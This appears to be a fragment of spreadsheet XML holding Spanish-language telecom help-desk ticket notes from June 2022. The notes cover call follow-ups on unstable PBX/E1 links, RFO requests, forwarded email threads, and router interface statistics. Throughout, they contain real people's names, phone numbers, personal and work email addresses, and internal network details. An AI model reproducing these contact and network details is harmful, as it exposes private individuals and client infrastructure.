FECHA Y HORA LOCALES: 15/06/2022 16:49:45</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MAURICIO ZELAYA QUIEN SOLICITA SE LE DE SEGUIMIENTO EL DIA DE MAÑANA YA QUE EL SERVICIO ESTA INESTABLE.
3001431348
COLA:
NOMBRE: A: 0050376823551
NÚMERO: 0050376823551
DURACIÓN: 0:04:18
ESTADO: CONECTADA
DETALLES: 0050376823551
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 16:55:09</t>
  </si>
  <si>
    <t>3001392004
COLA:
NOMBRE: A: 0050376823551
NÚMERO: 0050376823551
DURACIÓN: 0:00:41
ESTADO: CONECTADA
DETALLES: 0050376823551
SE LLAMO AL CLIENTE MAURICIO ZELAYA QUIEN SOLICITA SE LE LLAME A LAS 17:00HRS PARA VALIDAR.
YA QUE SE ENCUENTRA REALIZANDO PRUEBAS.
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 14:49:19</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MAURICIO ZELAYA 76823551 MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN PERO SOLICITA RFO
MAURICIO.ZELAYA2015@GMAIL.COM - SOPORTEIT@TAXISACACYA.COM
-ID 3001665558</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MAURICIO ZELAYA, QUIEN INDICA QUE CAMBIO UN CABLE DE LA PBX.
EN LO QUE SE HABLABA CON EL CLIENTE EL SERVICIO CAE. INDICA QUE SE ALARMO EL SYNC Y EL ALM EN ROJO.
SERVICIO INESTABLE CLIENTE SOLICITA VISITA TECNICA ESPERA LA LLEGADA DEL TECNICO.
3001163885
COLA:
NOMBRE: A: 0050376823551
NÚMERO: 0050376823551
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 0050376823551
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:02:31</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 18:09
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || ACACYA DE R.L.ASOC.COOP.AHORRO || F4601127
BUENA TARDE
   SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
ACACYA DE R.L.ASOC.COOP.AHORRO
25211000SV
F4601127 - SD1134975
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4601151</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 NO RESPONDE || SE INTENTARA LUEGO YA QUE AUN NO HAY RESPUESTA VIA CORREO **
-ID 3001587986
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON STEVEEN MÁRQUEZ/CLIENTE 2243-7253 INDICA QUE AÚN PERSISTE LO REPORTADO, SE LE PIDE PRUEBAS, INDICA QUE LAS ENVIARÁ, SIGUIENDO LA SECUENCIA DEL CORREO.</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD ---***
DE: GERALD TORRES (VENDOR) [MAILTO:GERALD.TORRES@WALMART.COM]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:06
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI CERVANTES ID: CONTR0002336242OC
PROCEDER.</t>
  </si>
  <si>
    <t>***--- CL VALIDA OPERATIVIDAD Y SE CONSULTA SI SE PUEDE PROCEDER CON EL CIERRE --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 04:03
PARA: GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI CERVANTES ID: CONTR0002336242OC
BUENOS DÍAS ESTIMADO SR. TORRES.
                GRACIAS POR LA CONFIRMACIÓN, PODRÍA INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: GERALD TORRES (VENDOR) [MAILTO:GERALD.TORRES@WALMART.COM]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 03:58
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI CERVANTES ID: CONTR0002336242OC
BUENOS DÍAS,
VALIDAMOS ENLACE OPERATIVO Y ESTABLE.
ENVIÓ GRAFICA DE LOS ÚLTIMOS  7 DÍAS ,
FAVOR DEJAR EN MONITOREO</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 11:34
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI CERVANTES ID: CONTR00023¿36242OC
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4601159</t>
  </si>
  <si>
    <t>CLIENTE YANPOUL QUEZADA INDICA QUE PIERDE EL AUDIO EN LLAMADAS DE 10 LLAMADAS EN 7 OCURRE EL EVENTO. SE LE SOLCITA PUEDA CONSEGUIR LAS CREDENCIALES DEL E1 PARA HACER CERTIFICACIÓN DEL E1, CLIENTE SOLICITA SE LE MARQUE EN 30 MINUTOS.
3001104428
COLA:
NOMBRE: A: 57174836
NÚMERO: 57174836
DURACIÓN: 0:03:13
ESTADO: CONECTADA
DETALLES: 57174836
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 12:04:59</t>
  </si>
  <si>
    <t>SE LE LLAMA AL CLINETE JEAN PARA NOTIFICARLE QUE EL TECNICO ESTIMA LLEGAR EN 50 MINUTOS PERO NO RESPONDE.
3001125002
COLA:
NOMBRE: A: 57174836
NÚMERO: 57174836
DURACIÓN: 0:00:06
ESTADO: MARCANDO
DETALLES: 57174836
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 13:00:27</t>
  </si>
  <si>
    <t>F4601162</t>
  </si>
  <si>
    <t>CLIENTE DAVID CASTILLO 54768138 INDICA QUE SU PBX ESTÁ DAÑADA Y AÚN ESTÁ PENDIENTE DE REPARACIÓN, POR LO QUE SOLICITA SE APLIQUE UN DESVIÓ, DE SU GDN 79629000  HACIA EL MOVIL 41503425. SE SOLICITARÁ A CX. ID: 3001120576</t>
  </si>
  <si>
    <t>SE LE INFORMA AL CLIENTE DAVID CASTILLO 54768138 QUE YA SE APLICÓ EL DESVÍO, CLIENTE SOLICITA SE LE LLAME EN 10 MINUTOS PARA VALIDAR. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4601164</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO SIERRA- 25935383 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001161066 - 3001161140</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAFAEL ROSALE S25935301  SUENA DESCONECTADO
-ID 3001160837</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEIDI MONTERROZA 70716309 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001160621</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAFAEL ROSALES 25935301 SE BRINDA RETROALIMENTACION **
-ID 3001141979
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HEIDI MONTERROZA  AL 70716309 NO RESPONDE SE INTENTARA LUEGO **
-ID 3001141389
**</t>
  </si>
  <si>
    <t>F4601173</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE GUSTAVO GONZALES QUIEN AUTORIZA EL CIERRE. DEL TICKET.
3001178019
COLA:
NOMBRE: A: 54608377
NÚMERO: 54608377
DURACIÓN: 0:00:11
ESTADO: CONECTADA
DETALLES: 54608377
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:43:51</t>
  </si>
  <si>
    <t>CLIENTE GUSTAVO NOS INDICA QUE EL PROBLEMA QUE PRESENTA ES AL MOMENTO DE REALIZAR LLAMADAS ENTRANTES Y SALIENTES, INDICA QUE ESCUCHA COMO AIRE Y DESPUES SE CORTA LA LLAMADA POR UNOS SEGUNDOS PERO LA LLAMADA NUNCA FINALIZA, INDICA QUE REINICIO EL EQUIPO Y LA PBX PERO EL SERVICIO NO RESTABLECE, INDICA QUE SE LE PUEDA APOYAR CON REALIZAR LA CERTIFIACCION DEL SERVICIO EL DIA DE HOY PARA VALIDAR DONDE SE ENCUENTRA EL INCONVENIENTE
NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMÓ A TÉCNICO ASIGNADO 58269663 PARA AVANCES, NO CONTESTA; ADICIONAL SE HABLÓ CON GUSTAVO GONZÁLEZ/CLIENTE 54608377, ÉSTE INDICA QUE TÉCNICO YA ESTÁ EN SUS INSTALACIONES, AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE GUSTAVO GONZALEZ 54608377
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA AL GDN INGRESA LA LLAMADA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4601177</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 78557884 CLIENTE NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001565216
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. VANESA PREZA 78557884 NO CONTESTO, IVR ENVIA A BUZON, VALIDAR MAÑANA A PRIMERA HORA, INFORMAR QUE ESTA SATURANDO SU ENLACE. RECOMENDAR QUE ESCALE A SU EJECUTIVO DE CUENTA PARA QUE PUEDA NEGOCIAR SI LE PROPORCIONAN UNA PRUEBA CON AUMENTO DE ANCHO DE BANDA PARA QUE EVALUE CUANDO ANCHO DE BANDA NECESITA SU RED LAN.
&lt;IDG000141&gt;DISP INT GI0/0/4
GIGABITETHERNET0/0/4 CURRENT STATE : UP
LINE PROTOCOL CURRENT STATE : UP
LAST LINE PROTOCOL UP TIME : 2022-06-14 11:21:12
DESCRIPTION:WAN PRINCIPAL /_/IDG000141SV/_/
ROUTE PORT,THE MAXIMUM TRANSMIT UNIT IS 1500
INTERNET ADDRESS IS 10.131.132.113/30
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS C4B8-B412-4864
LAST PHYSICAL UP TIME   : 2022-06-14 11:21:11
LAST PHYSICAL DOWN TIME : 2022-06-14 11:20:11
CURRENT SYSTEM TIME: 2022-06-16 00:26:44
PORT MODE: COMMON COPPER
SPEED :  100,  LOOPBACK: NONE
DUPLEX: FULL,  NEGOTIATION: ENABLE
MDI   : AUTO,  CLOCK   : -
LAST 300 SECONDS INPUT RATE 17501760 BITS/SEC, 1604 PACKETS/SEC
LAST 300 SECONDS OUTPUT RATE 806616 BITS/SEC, 859 PACKETS/SEC
INPUT PEAK RATE 25977296 BITS/SEC,RECORD TIME: 2022-06-14 23:38:45
OUTPUT PEAK RATE 27021704 BITS/SEC,RECORD TIME: 2022-06-15 11:30:56
INPUT:  62656412 PACKETS, 72941100818 BYTES
  UNICAST:           62656412,  MULTICAST:                   0
  BROADCAST:                0,  JUMBO:                       0
  DISCARD:                  0,  TOTAL ERROR:                 0
  CRC:                      0,  GIANTS:                      0
  JABBERS:                  0,  THROTTLES:                   0
  RUNTS:                    0,  SYMBOLS:                     0
  IGNOREDS:                 0,  FRAMES:                      0
OUTPUT:  29714396 PACKETS, 8714491909 BYTES
  UNICAST:           29714392,  MULTICAST:                   0
  BROADCAST:                4,  JUMBO:                       0
  DISCARD:                  0,  TOTAL ERROR:                 0
  COLLISIONS:               0,  EXCESSIVECOLLISIONS:         0
  LATE COLLISIONS:          0,  DEFERREDS:                   0
    INPUT BANDWIDTH UTILIZATION THRESHOLD : 100.00%
    OUTPUT BANDWIDTH UTILIZATION THRESHOLD: 100.00%
    INPUT BANDWIDTH UTILIZATION  : 12.39%
    OUTPUT BANDWIDTH UTILIZATION : 0.52%</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 78557884 CLIENTE NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001490598
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 22053700 CONTESTA LA SEÑORITA LETY HERNANDEZ E INDICA QUE LA SEÑORA VANESA NO SE ENCUENTRA SOLCIITA QUE SE LE LLAME A LAS 16:00 HRS **
-ID 3001377410
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 78557884 CLIENTE NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001499895
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 78557884 CLIENTE NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001536321
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 22053700 INFORMA QUE AUN TIENE INESTABILIDAD YA QUE POR RATOS SE LE CAE EL SERVICIO INDICA QUE HACE COMO MEDIA HORA SE LE VOLVIO A CAER Y RESTABLECIO || SE NOTIFICA A GESTOR **
-ID 3001149578
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  VANESA PREZA 78557884 CLIENTE NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001519551
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VANESA PREZA 78557884 - 22053700  MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001573345 - 3001573640</t>
  </si>
  <si>
    <t>F4601196</t>
  </si>
  <si>
    <t>CLIENTE BLANCA DE MORALES CONFIRMA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES, SE PROCEDE AL CIERRE DEL TICKET
SE LLAMA AL GDN Y INGRESA EL IVR 25249300
3001121229
COLA:
NOMBRE: A: 0050325249300
NÚMERO: 0050325249300
ESTADO: CONECTADA
DURACIÓN: 0:00:07
DETALLES: 0050325249300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 14/06/2022 12:48:58</t>
  </si>
  <si>
    <t>F4601199</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL RENATO LORENZANA 30246026 ID: 3001174397, VALIDA SERVICIO OK Y AUTORIZA EL CIERRE DEL TICKET*/*/*/SE SOLICITA A GESTORA EVELIN.MEJIA PROCEDER AL CIERRE*/*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23049696 QUIEN SOLICITA LLAMADA PARA MAÑANA A LAS 12:20 VALIDAR EL FUNCIONAMIENTO
-ID 3001110171</t>
  </si>
  <si>
    <t>F4601211</t>
  </si>
  <si>
    <t>SE HABLÓ CON FABIO SOSA/CLIENTE 51276289 SE LE EXPLICA LO DICHO POR BO SEGURIDAD, CABE HACER MENCIÓN QUE LOS SERVIDORES QUE LISTAN ESTAS PÁGINAS SON AJENAS A CLARO.</t>
  </si>
  <si>
    <t>SE HABLÓ CON FABIO SOSA/CLIENTE 51276289 INDICA QUE ESTÁN EN BUSCA DE ALGÚN TÉCNICO DE CONFIANZA PARA REALIZAR LO DICHO POR BO SEGURIDAD, PIDE SE LE LLAME HASTA EL DÍA LUNES ENTRE 08:00AM A 18:00 HORAS PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4601238</t>
  </si>
  <si>
    <t>##AUN NO SE TIENE COLA DE CORREOS CON RESPUESTA DEL CLIENTE ##</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, INDICANDO QUE ESTAMOS PENDIENTES A LOS COMENTARIOS ##CLIENTE AUN NO CONTESTA ##
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 10:36
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CARLOS EDUARDO CERRATO NUNEZ &lt;CARLOS.CERRATO@BACCREDOMATIC.HN&gt;; CRISTOPHER ROJAS ALFARO &lt;CROJASA@BACCREDOMATIC.CR&gt;; DENIIS AGUILAR RODRIGUEZ &lt;DAGUILARRO@BACCREDOMATIC.COM&gt;; JAVIER AGUILAR CASTRO &lt;JAGUILARC@BACCREDOMATIC.CR&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; DANILO ALBERTO PUERTO ROSALES &lt;DANILO.PUERTO@BACCREDOMATIC.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MARCELA LARISSA ALVARADO HERRERA &lt;MLALVARADOH@BACCREDOMATIC.HN&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: ESTEPHANY PAOLA CORTEZ SALGADO &lt;ESTEPHANY.CORTEZ@BACCREDOMATIC.HN&gt;; JORGE ALBERTO DAVID ZUNIGA &lt;JDAVID@BACCREDOMATIC.HN&gt;; ELMER OTTONIEL OCHOA PINEDA &lt;OOCHOA@BACCREDOMATIC.HN&gt;; G-SSC VENTAS HON &lt;G-SSCVENTASHON@BACCREDOMATIC.COM&gt;; JOSE ESTEBAN URGELLÉS VENTURA &lt;JOSE.URGELLES@BACCREDOMATIC.COM&gt;; JEAN CARLO SALAS SALAS &lt;JSALASSA@BACCREDOMATIC.COM&gt;; SAQITZ¿UNUN ULIL COJTI LOPEZ &lt;SAQITZUNUN.COJTI@CLARO.COM.GT&gt;; LUIS DAVID ZELAYA MONCADA &lt;LUIS.ZELAYA@BACCREDOMATIC.HN&gt;; JOSUE ADAN AGUILAR MORALES &lt;ADAN.AGUILAR@BACCREDOMATIC.HN&gt;; NAYELYN RAMIREZ VEGA &lt;NAYELYN.RAMIREZ@ASESOREXTERNOCA.COM&gt;; VALERY GABRIELA SEAMAN SHERAN &lt;VSEAMAN@BACCREDOMATIC.HN&gt;; G-TELEMATICA-HON-COM &lt;TELEMATICA@BACCREDOMATIC.HN&gt;; JOSE LUIS RODRIGUEZ PADILLA &lt;JLRODRIGUEZ@BACCREDOMATIC.HN&gt;; CARLOS RECINOS LEMUES &lt;CRECINOSL@BACCREDOMATIC.CR&gt;; DAVID LEONEL AMADOR MARADIAGA &lt;DAVID.AMADOR@BACCREDOMATIC.HN&gt;; ANNA KARINA DURON ESPINAL &lt;ADURON@BACCREDOMATIC.HN&gt;; JOSE ANTONIO MARADIAGA MARADIAGA &lt;JMARADIAGA@BACCREDOMATIC.HN&gt;
ASUNTO: RE: SD1129596// NUMERO PILOTO: 2283-4210// BULEVAR MORAZAN,EDIFICIO INTERAMERICANA,3ER PISO
BUENOS DÍAS ESTIMADOS, ESTAMOS PENDIENTES A SUS COMENTARIOS.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE VERIFICA COLA DE CORREOS: ASUNTO: RE: SD1129596// NUMERO PILOTO: 2283-4210// BULEVAR MORAZAN,EDIFICIO INTERAMERICANA,3ER PISO
##NO SE TIENE RESPUESTA POR PARTE DE CLIENTE,, A NIVEL DE CLARO TODO OK ## CLIENTE VERIFICA A NIVEL INTERNO## SE OBSERVA HASTA EL MOMENTO QUE NO SE TIENEN ERRORES EN INTERFAZ QUE SE CONECTA LA PBX.
##PROBLEMA UBICADO::: EN LA INTERCONEXION/PBX QUE CLIENTE TIENE HACIA DISPOSITIVOS DE CLARO##
##SEGUIMEITNO MAÑANA#
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\PRI1&gt;&gt;SHOW STATISTICS
STATISTICS OF PRI1 INTERFACE
-------------RX----------TX----------
LOS  ALARMS: 0
LOF  ALARMS: 0
AIS  ALARMS: 0           0
RAI  ALARMS: 0           0
BER  ALARMS: 0
CODE ERRORS: 0
FAS  ERRORS: 0
CRC  ERRORS: 0
FEBE ALARMS: 0
BER(LOCAL) : 0.00E+00
BER(REMOTE): 0.00E+00
COMMAND EXECUTED
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\PRI1&gt;&gt;</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE ### SE LE HA INDICADO QUE EL PROBLEMA NO ES DE CLARO, ES DE LA PBX Y POSIBLEMENTE EL CABLE ENTRE PBX Y AETHRA-- ##3 ESTE CABLE PERTENECE AL CLIENTE- CLARO NO BRINDA CABLE ENTRE AETRHA Y PLANTA DE CLIEINTE
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 13:24
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CARLOS EDUARDO CERRATO NUNEZ &lt;CARLOS.CERRATO@BACCREDOMATIC.HN&gt;; CRISTOPHER ROJAS ALFARO &lt;CROJASA@BACCREDOMATIC.CR&gt;; DENIIS AGUILAR RODRIGUEZ &lt;DAGUILARRO@BACCREDOMATIC.COM&gt;; JAVIER AGUILAR CASTRO &lt;JAGUILARC@BACCREDOMATIC.CR&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; DANILO ALBERTO PUERTO ROSALES &lt;DANILO.PUERTO@BACCREDOMATIC.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MARCELA LARISSA ALVARADO HERRERA &lt;MLALVARADOH@BACCREDOMATIC.HN&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: ESTEPHANY PAOLA CORTEZ SALGADO &lt;ESTEPHANY.CORTEZ@BACCREDOMATIC.HN&gt;; JORGE ALBERTO DAVID ZUNIGA &lt;JDAVID@BACCREDOMATIC.HN&gt;; ELMER OTTONIEL OCHOA PINEDA &lt;OOCHOA@BACCREDOMATIC.HN&gt;; G-SSC VENTAS HON &lt;G-SSCVENTASHON@BACCREDOMATIC.COM&gt;; JOSE ESTEBAN URGELLÉS VENTURA &lt;JOSE.URGELLES@BACCREDOMATIC.COM&gt;; JEAN CARLO SALAS SALAS &lt;JSALASSA@BACCREDOMATIC.COM&gt;; SAQITZ¿UNUN ULIL COJTI LOPEZ &lt;SAQITZUNUN.COJTI@CLARO.COM.GT&gt;; LUIS DAVID ZELAYA MONCADA &lt;LUIS.ZELAYA@BACCREDOMATIC.HN&gt;; JOSUE ADAN AGUILAR MORALES &lt;ADAN.AGUILAR@BACCREDOMATIC.HN&gt;; NAYELYN RAMIREZ VEGA &lt;NAYELYN.RAMIREZ@ASESOREXTERNOCA.COM&gt;; VALERY GABRIELA SEAMAN SHERAN &lt;VSEAMAN@BACCREDOMATIC.HN&gt;; G-TELEMATICA-HON-COM &lt;TELEMATICA@BACCREDOMATIC.HN&gt;; JOSE LUIS RODRIGUEZ PADILLA &lt;JLRODRIGUEZ@BACCREDOMATIC.HN&gt;; CARLOS RECINOS LEMUES &lt;CRECINOSL@BACCREDOMATIC.CR&gt;; DAVID LEONEL AMADOR MARADIAGA &lt;DAVID.AMADOR@BACCREDOMATIC.HN&gt;; ANNA KARINA DURON ESPINAL &lt;ADURON@BACCREDOMATIC.HN&gt;; JOSE ANTONIO MARADIAGA MARADIAGA &lt;JMARADIAGA@BACCREDOMATIC.HN&gt;
ASUNTO: RE: SD1129596// NUMERO PILOTO: 2283-4210// BULEVAR MORAZAN,EDIFICIO INTERAMERICANA,3ER PISO
BUENA TARDE ESTIMADOS, LE COMENTO: REALIZAMOS REVISIÓN DE MANERA EXHAUSTIVA Y DETERMINAMOS QUE  LO QUE ESTÁ PROVOCANDO QUE EL SERVICIO SE PERCIBA DE MANERA INESTABLE ES LA CONEXIÓN ENTRE SU PBX Y NUESTRO EQUIPO DE CLARO (AETRHA). ESTA CONEXIÓN FISICA YA FORMA PARTE A NIVEL INTERNO DE USTEDES.
